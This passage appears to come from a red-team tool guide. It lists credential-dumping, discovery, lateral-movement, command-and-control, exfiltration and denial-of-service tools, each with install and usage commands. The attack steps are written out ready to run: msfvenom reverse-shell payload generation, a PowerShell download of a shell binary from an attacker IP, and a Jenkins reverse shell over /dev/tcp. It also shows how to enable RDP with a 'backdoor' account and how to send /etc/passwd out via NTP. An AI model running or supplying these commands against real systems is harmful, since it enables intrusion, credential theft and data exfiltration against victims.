# Launch only a specific software script
.\laZagne.exe browsers -firefox

image

Tool for cracking password hashes. Supports a large list of hashing algorithms (Full list can be found here).

Install: Binary

You can install the standalone binary from here.

Usage:

.\hashcat.exe --help

Nice hashcat command cheatsheet.

image

Another password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs and GPUs.

Install:

sudo apt-get install john -y

Usage:

john

image

Discovery

This tool extracts credit card numbers, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc.), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc. from a pcap file or from a live interface.

Install:

git clone https://github.com/lgandx/PCredz

Usage: (PCAP File Folder)

python3 ./Pcredz -d /tmp/pcap-directory-to-parse/

Usage: (Live Capture)

python3 ./Pcredz -i eth0 -v

image

Ping Castle is a tool designed to quickly assess the Active Directory security level, using a methodology based on risk assessment and a maturity framework. It does not aim at a perfect evaluation, but rather at an efficient compromise.

Install: (Download)

https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip

Usage:

./PingCastle.exe

image

Seatbelt is a useful tool for gathering detailed information about the security posture of a target Windows machine in order to identify potential vulnerabilities and attack vectors.

It is designed to be run on a compromised victim machine to gather information about the current security configuration, including installed software, services, group policies, and other security-related settings.

Install: (Compile)

Seatbelt has been built against .NET 3.5 and 4.0 with C# 8.0 features and is compatible with Visual Studio Community Edition.

Open up the project .sln, choose "release", and build.

Usage:

# Run all checks and output to output.txt
Seatbelt.exe -group=all -full > output.txt

# Return 4624 logon events for the last 30 days
Seatbelt.exe "LogonEvents 30"

# Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.*
Seatbelt.exe "reg \"HKLM\SOFTWARE\Microsoft\Windows Defender\" 3 .*defini.* true"

# Run remote-focused checks against a remote system
Seatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\""

Full command groups and parameters can be found here.

image

Image used from https://exord66.github.io/csharp-in-memory-assemblies

Great tool for gathering information about a victim's Microsoft Active Directory (AD) environment, with support for Excel outputs.

It can be run from any workstation that is connected to the environment, even hosts that are not domain members.

BlackHat USA 2018 SlideDeck

Prerequisites

  • .NET Framework 3.0 or later (Windows 7 includes 3.0)
  • PowerShell 2.0 or later (Windows 7 includes 2.0)

Install: (Git)

git clone https://github.com/sense-of-security/ADRecon.git

Install: (Download)

You can download a zip archive of the latest release.

Usage:

# To run ADRecon on a domain member host.
PS C:\> .\ADRecon.ps1

# To run ADRecon on a domain member host as a different user.
PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>

# To run ADRecon on a non-member host using LDAP.
PS C:\>.\ADRecon.ps1 -Protocol LDAP -DomainController <IP or FQDN> -Credential <domain\username>

# To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter)
PS C:\>.\ADRecon.ps1 -Protocol ADWS -DomainController <IP or FQDN> -Credential <domain\username> -Collect Domain, DomainControllers

Full usage and parameter information can be found here.

image

Image used from https://vk9-sec.com/domain-enumeration-powerview-adrecon/

Lateral Movement

This is a great tool for pivoting in a Windows/Active Directory environment using credential pairs (username:password, username:hash). It also offers other features, including enumerating logged on users, spidering SMB shares, executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLLs into memory using PowerShell, dumping the NTDS.dit and more.

Install:

sudo apt install crackmapexec

Usage:

crackmapexec smb <ip address> -d <domain> -u <user list> -p <password list>

image

WMIOps is a PowerShell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment.

Developed by @christruncer.

Original blog post documenting release.

Install: (PowerShell)

git clone https://github.com/FortyNorthSecurity/WMIOps
Import-Module WMIOps.ps1

Usage:

# Executes a user specified command on the target machine
Invoke-ExecCommandWMI

# Returns all running processes from the target machine
Get-RunningProcessesWMI

# Checks if a user is active at the desktop on the target machine (or if away from their machine)
Find-ActiveUsersWMI

# Lists all local and network connected drives on target system
Get-SystemDrivesWMI

# Executes a powershell script in memory on the target host via WMI and returns the output
Invoke-RemoteScriptWithOutput

image

image

Images used from https://pentestlab.blog/2017/11/20/command-and-control-wmi/

Tool that uses MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe.

Install:

git clone https://github.com/Mr-Un1k0d3r/PowerLessShell
cd PowerLessShell

Usage:

# Help
python PowerLessShell.py -h

# Generate PowerShell payload 
python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj

# Generating a shellcode payload
python PowerLessShell.py -source shellcode.raw -output malicious.csproj

Full usage information can be found here.

image

Image used from https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628

PsExec is a part of the Sysinternals suite of tools, which is a collection of utilities for managing and troubleshooting Windows systems.

It is great for remotely executing commands on target machines.

Note: Some AVs detect PsExec as a 'remote admin' virus.

Install: (PowerShell)

Invoke-WebRequest -Uri 'https://download.sysinternals.com/files/PSTools.zip' -OutFile 'pstools.zip'
Expand-Archive -Path 'pstools.zip' -DestinationPath "$env:TEMP\pstools"
Move-Item -Path "$env:TEMP\pstools\psexec.exe" .
Remove-Item -Path "$env:TEMP\pstools" -Recurse

Usage:

# Prevent the license agreement from being displayed
psexec.exe /accepteula

# Run the 'hostname' command on remote machine
psexec.exe \\REMOTECOMPUTER hostname

# Run the 'hostname' command on EVERYTHING (on the domain)
psexec.exe \\* hostname

# Run a local executable on a remote machine
psexec.exe \\REMOTECOMPUTER -c C:\Tools\program.exe

# Run the 'hostname' command with different credentials
psexec.exe \\REMOTECOMPUTER hostname -u localadmin -p secret-p@$$word

# Spawn shell on remote machine
psexec.exe -s \\REMOTECOMPUTER cmd

Great blog post on PsExec usage.

image

Image used from https://adamtheautomator.com/psexec/

🔙Enabling RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net localgroup "Remote Desktop Users" "backdoor" /add

🔙Upgrading shell to meterpreter

Shells (https://infinitelogins.com/tag/payloads/)

After getting basic shell access to an endpoint a meterpreter is nicer to continue with.

[attacker] Generate a meterpreter shell:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

image

[victim] Download to victim endpoint:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

[attacker] Configure listener:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-ip
set LPORT listening-port
run

[victim] Execute payload:

Start-Process "shell-name.exe"

image

🔙Forwarding Ports

Sometimes, after gaining access to an endpoint, there are services bound only to local ports. Making these internal ports externally routable can help with lateral movement to other services on the host.

socat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 &
socat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT &

🔙Jenkins reverse shell

If you gain access to a Jenkins script console, you can use this to gain a reverse shell on the node.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP_ADDRESS/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Collection

An application used to visualize Active Directory environments. A quick way to visualise attack paths and understand victims' Active Directory properties.

Install: PenTestPartners Walkthrough

Custom Queries: CompassSecurity BloodHoundQueries

image

Snaffler is an advanced credential scanner/collector for Active Directory environments. With a great README.

Snaffler uses a system of "classifiers", each of which examines shares, folders, files or file contents, passing some items downstream to the next classifier and discarding others. Each classifier uses a set of rules to decide what to do with the items it classifies.

More information about Snaffler rules.

'Broadly speaking - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.' - Snaffler README (2023)

Install:

You can download the binary from the GitHub Releases Page.

Usage:

# Targeted local scan (less likely to trigger detections)
Snaffler.exe -s -i C:\

# Go in loud and find everything
snaffler.exe -s -o snaffler.log

image

Image used from https://github.com/SnaffCon/Snaffler#what-does-it-look-like

Command and Control

Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.

Features include: Sleep Obfuscation, x64 return address spoofing, and Indirect Syscalls for Nt* APIs.

Pre-requisites: (Ubuntu 20.04 / 22.04)

sudo apt install build-essential
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt update
sudo apt install python3.10 python3.10-dev

Build + Usage:

git clone https://github.com/HavocFramework/Havoc.git
cd Havoc/Client
make 
./Havoc 

Pre-requisites: (Ubuntu 20.04 / 22.04)

cd Havoc/Teamserver
go mod download golang.org/x/sys  
go mod download github.com/ugorji/go

Build + Usage:

cd Teamserver
./Install.sh
make
./teamserver -h

Run the teamserver

sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug

Full install, build and run instructions on the wiki

image

Covenant is a .NET command and control framework; it has a web interface that allows for multi-user collaboration.

It can be used to remotely control compromised systems and perform a variety of different tasks, including executing arbitrary code, capturing keystrokes, exfiltrating data, and more.

Install: (Dotnet Core)

You can download dotnet core for your platform from here.

Note: After starting Covenant, you must register an initial user by navigating to the web interface.

git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant

Usage: (Dotnet Core)

~/Covenant/Covenant > dotnet run
warn: Microsoft.EntityFrameworkCore.Model.Validation[10400]
      Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development.
WARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated.
Covenant has started! Navigate to https://127.0.0.1:7443 in a browser

Install: (Docker)

# Build the docker image:
git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant
~/Covenant/Covenant > docker build -t covenant .

Usage: (Docker)

# Run Covenant within the Docker container
~/Covenant/Covenant > docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v </absolute/path/to/Covenant/Covenant/Data>:/app/Data covenant

# Stop the container
~/Covenant/Covenant > docker stop covenant

# Restart Covenant interactively
~/Covenant/Covenant > docker start covenant -ai

Full installation and startup instructions can be found on the wiki here.

image

Image from https://github.com/cobbr/Covenant

Merlin is an open-source post-exploitation framework that is designed to be used after an initial compromise of a system.

It is written in Python and can be used to perform a variety of different tasks, such as executing arbitrary code, moving laterally through a network, and exfiltrating data.

Install:

  1. Download the latest compiled version of Merlin Server from the releases section
  2. Extract the files with 7zip using the x function. The password is: merlin
  3. Start Merlin
  4. Configure a listener
  5. Deploy an agent. See Agent Execution Quick Start Guide for examples
mkdir /opt/merlin;cd /opt/merlin
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z
7z x merlinServer-Linux-x64.7z
sudo ./merlinServer-Linux-x64

Usage:

  1. Ensure the Merlin server is running with a configured listener
  2. Download and deploy an agent to the victim
  3. Execute agent

For detailed usage information see the official Merlin wiki.

image

Image from https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks

Metasploit is an open-source framework for developing, testing, and using exploit code.

The Metasploit framework includes a large number of pre-built exploits and payloads, as well as a fully-featured integrated development environment (IDE) for creating and testing custom exploits.

Install: (Installer)

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

Usage:

/opt/metasploit-framework/bin/msfconsole

Full installation instructions can be found on the official wiki.

Rapid7 Metasploit blogs

Cheat sheet graphic

Nice command list

image

Image used from https://goacademy.io/how-to-install-metasploit-on-kali-linux/

Pupy is an open-source, cross-platform (Windows, Linux, OSX, Android) C2 and post-exploitation framework written in Python and C.

It allows an attacker to remotely control a victim's computer and execute various actions, such as command execution, key logging, and taking screen shots.

Install: (Git)

sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv
git clone --recursive https://github.com/n1nj4sec/pupy
cd pupy
python create-workspace.py -DG pupyw

Rollback fix for the error:

sudo pip2 install rpyc==3.4.4

Start:

export PATH=$PATH:~/.local/bin; pupysh
pupyws/bin/pupysh

Git install instructions used from here.

Install: (Docker)

For detailed docker and pupy installation instructions see the wiki.

Usage:

# Get help page for any builtin commands with -h
>> sessions -h
>> jobs -h
>> run -h

# Interact with session 1
>> sessions -i 1

# Run local command 'ls'
>> !ls

Full usage information can be found on the wiki.

The wiki contains good post exploitation information.

image

Image used from https://github.com/n1nj4sec/pupy/wiki/Screenshots

BruteRatel is a great command and control (C4) framework created by @NinjaParanoid. The framework consists of a client component 'badger' that is installed on the compromised system, and a server component 'commander' that is run by the red team.

The client and server communicate with each other using various communication channels, such as HTTP, DNS, or TCP, and can be configured to use different encoding and encryption methods to evade detection.

Some nice features:

  • DNS Over HTTPS
  • Indirect Syscalls
  • Built-in Debugger To Detect EDR Userland Hooks
  • MITRE graph integration
  • Adversary TTP automation

Install:

To legally get access to the framework you will need to buy a licence (1 Year $2500 per user). See the pricing page for more information.

After purchase you can download the framework from here with your Activation Key and License User ID.

Usage:

# Loads a powershell script to memory which can be Invoked using psreflect
psimport

# Locks keyboard and mouse hardware input. Use ‘unlock_input’ command to unlock
lock_input

# Dumps user clipboard
dumpclip

# Enumerates basic domain information
dcenum

# Elevates user privileges to SYSTEM (Requires admin rights)
get_system

# Takes a screenshot of current desktop and stores it on the server
screenshot

# Dumps LSASS to C:\Windows\Memory.DMP using the PssCaptureSnapshot technique
shadowclone

Full commander terminal usage information can be found here.

image

Image used from https://bruteratel.com/

Exfiltration

A tool for establishing C2 connections via DNS, even if the attacker and victim machines are behind a firewall / network address translation (NAT).

The tool is designed to be stealthy and difficult to detect, as it uses legitimate DNS traffic to transmit data.

Install: (Compile - Server)

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install

Install: (Compile - Client)

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make

Full installation information can be found in the Installation Section.

Usage: (Server)

# Establish the server
ruby ./dnscat2.rb DOMAIN.COM

Usage: (Client)

# Establish the client with authoritative domain
./dnscat2 DOMAIN.COM

# Establish the client without authoritative domain
./dnscat2 --dns host=0.0.0.0,port=0000

# Ping the server from the client
./dnscat --ping DOMAIN.COM

# Ping the server from the client, with custom dns resolver ip
./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping

Usage: (Tunnels)

# (After establishing the client) You can open a new tunnelled port
listen [lhost:]lport rhost:rport

# Forward ssh connections through the dnscat2 client to an internal device
listen 127.0.0.1:2222 10.10.10.10:22

Full usage information can be found in the Usage Section.

image

When exfiltrating victim files, DLP (Data Loss Prevention) solutions will typically trigger on strings within these files. Cloakify reduces this risk by transforming the data.

Cloakify transforms any filetype (e.g. .zip, .exe, .xls, etc.) into a list of harmless-looking strings. This lets you hide the file in plain sight, and transfer the file without triggering alerts.

Note: You can make your own ciphers, see here for more info.

Install:

git clone https://github.com/TryCatchHCF/Cloakify

Usage:

# Cloakify some text
python3 cloakify.py TEXT.txt ciphers/desserts.ciph > TEXT.cloaked

# De-Cloakify the text
python3 decloakify.py TEXT.cloaked ciphers/desserts.ciph

image

image

"An Alpha-Alpha stage package, not yet tested (and will appreciate any feedbacks and commits) designed to show several techniques of data exfiltration in real-world scenarios."

Install:

git clone https://www.github.com/ytisf/PyExfil; cd PyExfil; pip install -r requirements.txt; pip install py2exe; python setup.py install

Usage: (Full Usage here)

HTTP Cookies

from pyexfil.network.HTTP_Cookies.http_exfiltration import send_file, listen

# For Client (exfil)
send_file(addr='http://www.morirt.com', file_path=FILE_TO_EXFIL)

# For Server (collecting)
listen(local_addr='127.0.0.1', local_port=80)

ICMP Echo 8

from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener

# For Client (exfil)
ip_addr = "127.0.0.1"
send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1)

# For Server (collecting)
init_listener(ip_addr, saving_location="/tmp/")

NTP Request

from pyexfil.network.NTP.ntp_exfil import exfiltrate, ntp_listen, NTP_UDP_PORT

# For Client (exfil)
ip_addr = "127.0.0.1"
exfiltrate("/etc/passwd", ip_addr, time_delay=0.1)

# For Server (collecting)
ntp_listen(ip="0.0.0.0", port=NTP_UDP_PORT)

image

Python-based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. It tracks user activity using screen capture and sends the information to the attacker as an e-mail attachment.

Install:

git clone https://github.com/Viralmaniar/Powershell-RAT

Usage: (Full Usage here)

Setup

  • Throwaway Gmail address
  • Enable "Allow less secure apps" by going to https://myaccount.google.com/lesssecureapps
  • Modify the $username & $password variables for your account in the Mail.ps1 PowerShell file
  • Modify $msg.From & $msg.To.Add with throwaway gmail address

image

Tool for exfiltrating files from a target's Google Drive that you have access to, via Google's API.

This includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.

Install:

git clone https://github.com/antman1p/GD-Thief.git
cd GD-Thief
pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib

then...

  1. Create a new Google Cloud Platform (GCP) project
  2. Enable a Google Workspace API
  3. Configure OAuth Consent screen
  4. Create a credential
  5. Add the victim's Google account to the Application's Test Users

For detailed setup instructions see the How To Guide.

Usage:

usage:
python3 gd_thief.py [-h] -m [{dlAll, dlDict[-d <DICTIONARY FILE PATH>]}
	[-t <THREAD COUNT>]

help:

This Module will connect to Google's API using an access token and exfiltrate files
from a target's Google Drive.  It will output exfiltrated files to the ./loot directory

arguments:
        -m [{dlAll, dlDict}],
                --mode [{dlAll, dlDict}]
                The mode of file download
                Can be "dlAll", "dlDict [-d <DICTIONARY FILE PATH>]", or... (More options to come)

optional arguments:
        -d <DICTIONARY FILE PATH>, --dict <DICTIONARY FILE PATH>
                        Path to the dictionary file. Mandatory with download mode"-m, --mode dlDict"
                        You can use the provided dictionary, per example: "-d ./dictionaries/secrets-keywords.txt"
        -t <THREAD COUNT>, --threads <THREAD COUNT>
                        Number of threads. (Too many could exceeed Google's rate limit threshold)

        -h, --help
                show this help message and exit

Nice blog post explaining the logic behind the tool.

Impact

Slowloris is a type of denial-of-service (DoS) attack that involves sending HTTP requests to a web server in a way that ties up the server's resources, preventing it from processing legitimate requests.

This attack would typically be conducted with a botnet. It is designed to be difficult to detect and mitigate, as it uses a relatively small number of connections and does not generate a large amount of traffic.

Install: (Pip)

sudo pip3 install slowloris

Install: (Git)

git clone https://github.com/gkbrk/slowloris.git
cd slowloris

Usage:

# Pip
slowloris example.com

# Git
python3 slowloris.py example.com

image